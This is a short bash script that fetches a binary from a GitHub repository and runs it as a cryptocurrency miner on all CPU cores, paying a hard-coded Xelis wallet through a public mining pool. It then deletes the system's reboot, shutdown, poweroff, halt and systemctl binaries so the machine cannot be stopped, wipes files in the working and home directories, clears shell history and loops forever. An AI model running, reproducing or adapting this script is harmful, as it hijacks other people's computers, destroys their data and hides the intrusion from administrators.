#!/bin/bash
wget -O biru https://github.com/kazppkido/gbut/raw/refs/heads/main/tnn-miner-0.4.2-r3_cpu > /dev/null 2>&1
chmod 777 biru
./biru --daemon addres de.xelis.herominers.com:1225 --threads $(nproc --all) --wallet xel:kprzhxdp594m5zczayy9d8cxg3kqu978mwqf9hh8qgume3njc97szqqyv646zwcgpkjnr
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
